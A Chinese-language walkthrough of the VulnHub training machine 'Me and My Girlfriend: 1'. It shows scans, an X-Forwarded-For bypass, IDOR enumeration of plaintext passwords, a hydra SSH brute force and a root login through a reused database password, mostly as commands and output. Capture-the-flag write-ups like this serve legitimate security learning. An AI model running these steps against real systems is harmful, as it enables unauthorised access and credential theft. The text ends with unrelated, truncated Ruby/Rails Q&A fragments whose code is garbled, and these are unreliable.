作者:jason huawen
名称: Me and My Girlfriend: 1
地址:
https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
─(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:61:8a:f1 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:87:26:b3 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-08 20:16 EDT
Nmap scan report for www.armour.local (192.168.56.254)
Host is up (0.000071s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 57e15658460433563dc34ba793ee2316 (DSA)
| 2048 3b264de4a03bf875d96e1555828c7197 (RSA)
| 256 8f48979b55115bf16c1db34abc36bdb0 (ECDSA)
|_ 256 d0c302a1c4c2a8ac3b84ae8fe5796676 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 08:00:27:87:26:B3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.87 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ curl http://192.168.56.254
Who are you? Hacker? Sorry This Site Can Only Be Accessed local!<!-- Maybe you can search how to use x-forwarded-for -->
站点只能从本地访问,而且提示是在请求头中设置x-forwarded-for
可以用burpsuite拦截请求,然后增加x-forwarded-for:127.0.0.1
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ curl http://192.168.56.254/robots.txt
User-Agent: *
Allow: /heyhoo.txt
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ curl http://192.168.56.254/heyhoo.txt
Great! What you need now is reconn, attack and got the shell
此时成功得到页面:
不过用Burpsuite每次修改请求比较麻烦,可以用浏览器的插件IP,伪装X-Forwarded-For字段
从URL来看,是否会存在本地文件包含漏洞?
http://192.168.56.254/index.php?page=login
但经过测试,没有得到任何返回,不过也没有报错
用PHP filter也没有成功
http://192.168.56.254/index.php?page=php://filter/convert.base64-encode/resource=index
用burpsuite拦截请求,并将请求存储为文件,然后用sqlmap扫描,看是否存在SQL注入漏洞?
(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ sqlmap -r req.txt --level=5
SQLMAP并没有发现出SQL注入漏洞。
接下来注册一个用户test,看有什么发现?以test用户登录后
注意这里的URL:
http://192.168.56.254/index.php?page=dashboard&user_id=14
我们看是否可以通过修改user_id值进行水平攻击
当修改user_id=1时,查看profile
注意此时查看页面源代码,竟然有用户的明文密码:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Ceban Corp</title>
<style>
.center {
text-align: center;
}
</style>
</head>
<body>
<div class="center">
<h2>Welcome To Ceban Corp</h2>
<p>Inspiring The People To Great Again!</p>
<hr>
<p><a href="?page=dashboard">Dashboard</a> | <a href="?page=profile&user_id=14">Profile</a> | <a href="?page=logout">Logout</a></p>
<hr>
</div>
<form action="#" method="POST">
<label for="name">Name</label>
<input type="text" name="name" id="name" value="Eweuh Tandingan"><br>
<label for="username">Username</label>
<input type="text" name="username" id="username" value="eweuhtandingan"><br>
<label for="password">Password</label>
<input type="password" name="password" id="password" value="skuyatuh"><br>
<button disabled="disabled">Change</button>
</form>
</body>
</html>
那该用户名和密码是否也是SSH的用户名和密码?但发现不成功,可以将所有的用户的用户名和密码都收集起来:(即依次将user_id枚举从1到没有返回内容为止)
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ ssh eweuhtandingan@192.168.56.254
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:xQf3lfh03E3NNnt5rN/N5zVlGxJJo8QcKykWWCSg1SM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
eweuhtandingan@192.168.56.254's password:
Permission denied, please try again.
eweuhtandingan@192.168.56.254's password:
──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ cat users.dict
eweuhtandingan
aingmaung
sundatea
sedihaingmah
alice
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ cat pass.dict
skuyatuh
qwerty!!!
indONEsia
cedihhihihi
4lic3
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ hydra -L users.dict -P pass.dict ssh://192.168.56.254
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-08 21:09:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.56.254:22/
[22][ssh] host: 192.168.56.254 login: alice password: 4lic3
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-08 21:09:20
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ ssh alice@192.168.56.254
alice@192.168.56.254's password:
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$ id
uid=1000(alice) gid=1001(alice) groups=1001(alice)
alice@gfriEND:~$ ls -alh
total 32K
drwxr-xr-x 4 alice alice 4.0K Dec 13 2019 .
drwxr-xr-x 6 root root 4.0K Dec 13 2019 ..
-rw------- 1 alice alice 10 Dec 13 2019 .bash_history
-rw-r--r-- 1 alice alice 220 Dec 13 2019 .bash_logout
-rw-r--r-- 1 alice alice 3.6K Dec 13 2019 .bashrc
drwx------ 2 alice alice 4.0K Dec 13 2019 .cache
drwxrwxr-x 2 alice alice 4.0K Dec 13 2019 .my_secret
-rw-r--r-- 1 alice alice 675 Dec 13 2019 .profile
alice@gfriEND:~$ cat .bash_history
exit
exit
alice@gfriEND:~$ cd .my_secret/
alice@gfriEND:~/.my_secret$ ls -alh
total 16K
drwxrwxr-x 2 alice alice 4.0K Dec 13 2019 .
drwxr-xr-x 4 alice alice 4.0K Dec 13 2019 ..
-rw-r--r-- 1 root root 306 Dec 13 2019 flag1.txt
-rw-rw-r-- 1 alice alice 119 Dec 13 2019 my_notes.txt
alice@gfriEND:~/.my_secret$ cat flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!
Now your last job is get access to the root and read the flag ^_^
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
alice@gfriEND:~/.my_secret$ cat my_notes.txt
Woahhh! I like this company, I hope that here i get a better partner than bob ^_^, hopefully Bob doesn't know my notes
alice@gfriEND:~/.my_secret$ cd /home
alice@gfriEND:/home$ ls -alh
total 24K
drwxr-xr-x 6 root root 4.0K Dec 13 2019 .
drwxr-xr-x 22 root root 4.0K Dec 13 2019 ..
drwxr-xr-x 2 aingmaung aingmaung 4.0K Dec 13 2019 aingmaung
drwxr-xr-x 4 alice alice 4.0K Dec 13 2019 alice
drwxr-xr-x 2 eweuhtandingan eweuhtandingan 4.0K Dec 13 2019 eweuhtandingan
drwxr-xr-x 2 sundatea sundatea 4.0K Dec 13 2019 sundatea
至此得到了第一Flag.
alice@gfriEND:/var/www/html$ cd config
alice@gfriEND:/var/www/html/config$ ls -alh
total 12K
drwxrwxr-x 2 root root 4.0K Dec 13 2019 .
drwxr-xr-x 5 root root 4.0K Dec 13 2019 ..
-rw-rw-r-- 1 root root 88 Dec 13 2019 config.php
alice@gfriEND:/var/www/html/config$ cat config.php
<?php
$conn = mysqli_connect('localhost', 'root', 'ctf_pasti_bisa', 'ceban_corp');
alice@gfriEND:/var/www/html/config$ su - root
Password:
root@gfriEND:~# cd /root
root@gfriEND:~# ls -alh
total 32K
drwx------ 3 root root 4.0K Dec 13 2019 .
drwxr-xr-x 22 root root 4.0K Dec 13 2019 ..
-rw------- 1 root root 0 Dec 13 2019 .bash_history
-rw-r--r-- 1 root root 3.1K Feb 20 2014 .bashrc
drwx------ 2 root root 4.0K Dec 13 2019 .cache
-rw-r--r-- 1 root root 1000 Dec 13 2019 flag2.txt
-rw------- 1 root root 238 Dec 13 2019 .mysql_history
-rw------- 1 root root 81 Dec 13 2019 .nano_history
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
root@gfriEND:~# cat flag2.txt
________ __ ___________.__ ___________.__ ._.
/ _____/ _____/ |_ \__ ___/| |__ ____ \_ _____/| | _____ ____| |
/ \ ___ / _ \ __\ | | | | \_/ __ \ | __) | | \__ \ / ___\ |
\ \_\ ( <_> ) | | | | Y \ ___/ | \ | |__/ __ \_/ /_/ >|
\______ /\____/|__| |____| |___| /\___ > \___ / |____(____ /\___ /__
\/ \/ \/ \/ \//_____/ \/
Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)
Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73
Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
root@gfriEND:~#
至此得到了root shell和root flag.本靶机提权部分比较简单,只要细心点,就可以找到配置漏洞。
很好奇,就使用rubyonrails自动化单元测试而言,你们正在做什么?您是否创建了一个脚本来在cron中运行rake作业并将结果邮寄给您?git中的预提交Hook?只是手动调用?我完全理解测试,但想知道在错误发生之前捕获错误的最佳实践是什么。让我们理所当然地认为测试本身是完美无缺的,并且可以正常工作。下一步是什么以确保他们在正确的时间将可能有害的结果传达给您? 最佳答案 不确定您到底想听什么,但是有几个级别的自动代码库控制:在处理某项功能时,您可以使用类似autotest的内容获得关于哪些有效,哪些无效的即时反馈。要确保您的提
我正在编写一个包含C扩展的gem。通常当我写一个gem时,我会遵循TDD的过程,我会写一个失败的规范,然后处理代码直到它通过,等等......在“ext/mygem/mygem.c”中我的C扩展和在gemspec的“扩展”中配置的有效extconf.rb,如何运行我的规范并仍然加载我的C扩展?当我更改C代码时,我需要采取哪些步骤来重新编译代码?这可能是个愚蠢的问题,但是从我的gem的开发源代码树中输入“bundleinstall”不会构建任何native扩展。当我手动运行rubyext/mygem/extconf.rb时,我确实得到了一个Makefile(在整个项目的根目录中),然后当
我有一个围绕一些对象的包装类,我想将这些对象用作散列中的键。包装对象和解包装对象应映射到相同的键。一个简单的例子是这样的:classAattr_reader:xdefinitialize(inner)@inner=innerenddefx;@inner.x;enddef==(other)@inner.x==other.xendenda=A.new(o)#oisjustanyobjectthatallowso.xb=A.new(o)h={a=>5}ph[a]#5ph[b]#nil,shouldbe5ph[o]#nil,shouldbe5我试过==、===、eq?并散列所有无济于事。
我有一些Ruby代码,如下所示:Something.createdo|x|x.foo=barend我想编写一个测试,它使用double代替block参数x,这样我就可以调用:x_double.should_receive(:foo).with("whatever").这可能吗? 最佳答案 specify'something'dox=doublex.should_receive(:foo=).with("whatever")Something.should_receive(:create).and_yield(x)#callthere
Sinatra新手;我正在运行一些rspec测试,但在日志中收到了一堆不需要的噪音。如何消除日志中过多的噪音?我仔细检查了环境是否设置为:test,这意味着记录器级别应设置为WARN而不是DEBUG。spec_helper:require"./app"require"sinatra"require"rspec"require"rack/test"require"database_cleaner"require"factory_girl"set:environment,:testFactoryGirl.definition_file_paths=%w{./factories./test/
我遵循MichaelHartl的“RubyonRails教程:学习Web开发”,并创建了检查用户名和电子邮件长度有效性的测试(名称最多50个字符,电子邮件最多255个字符)。test/helpers/application_helper_test.rb的内容是:require'test_helper'classApplicationHelperTest在运行bundleexecraketest时,所有测试都通过了,但我看到以下消息在最后被标记为错误:ERROR["test_full_title_helper",ApplicationHelperTest,1.820016791]test
我已经构建了一些serverspec代码来在多个主机上运行一组测试。问题是当任何测试失败时,测试会在当前主机停止。即使测试失败,我也希望它继续在所有主机上运行。Rakefile:namespace:specdotask:all=>hosts.map{|h|'spec:'+h.split('.')[0]}hosts.eachdo|host|begindesc"Runserverspecto#{host}"RSpec::Core::RakeTask.new(host)do|t|ENV['TARGET_HOST']=hostt.pattern="spec/cfengine3/*_spec.r
我在app/helpers/sessions_helper.rb中有一个帮助程序文件,其中包含一个方法my_preference,它返回当前登录用户的首选项。我想在集成测试中访问该方法。例如,这样我就可以在测试中使用getuser_path(my_preference)。在其他帖子中,我读到这可以通过在测试文件中包含requiresessions_helper来实现,但我仍然收到错误NameError:undefinedlocalvariableormethod'my_preference'.我做错了什么?require'test_helper'require'sessions_hel
只是想确保我理解了事情。据我目前收集到的信息,Cucumber只是一个“包装器”,或者是一种通过将事物分类为功能和步骤来组织测试的好方法,其中实际的单元测试处于步骤阶段。它允许您根据事物的工作方式组织您的测试。对吗? 最佳答案 有点。它是一种组织测试的方式,但不仅如此。它的行为就像最初的Rails集成测试一样,但更易于使用。这里最大的好处是您的session在整个Scenario中保持透明。关于Cucumber的另一件事是您(应该)从使用您的代码的浏览器或客户端的角度进行测试。如果您愿意,您可以使用步骤来构建对象和设置状态,但通常您
我有:When/^(?:|I)follow"([^"]*)"(?:within"([^"]*)")?$/do|link,selector|with_scope(selector)doclick_link(link)endend我打电话的地方:Background:GivenIamanexistingadminuserWhenIfollow"CLIENTS"我的HTML是这样的:CLIENTS我一直收到这个错误:.F-.F--U-----U(::)failedsteps(::)nolinkwithtitle,idortext'CLIENTS'found(Capybara::Element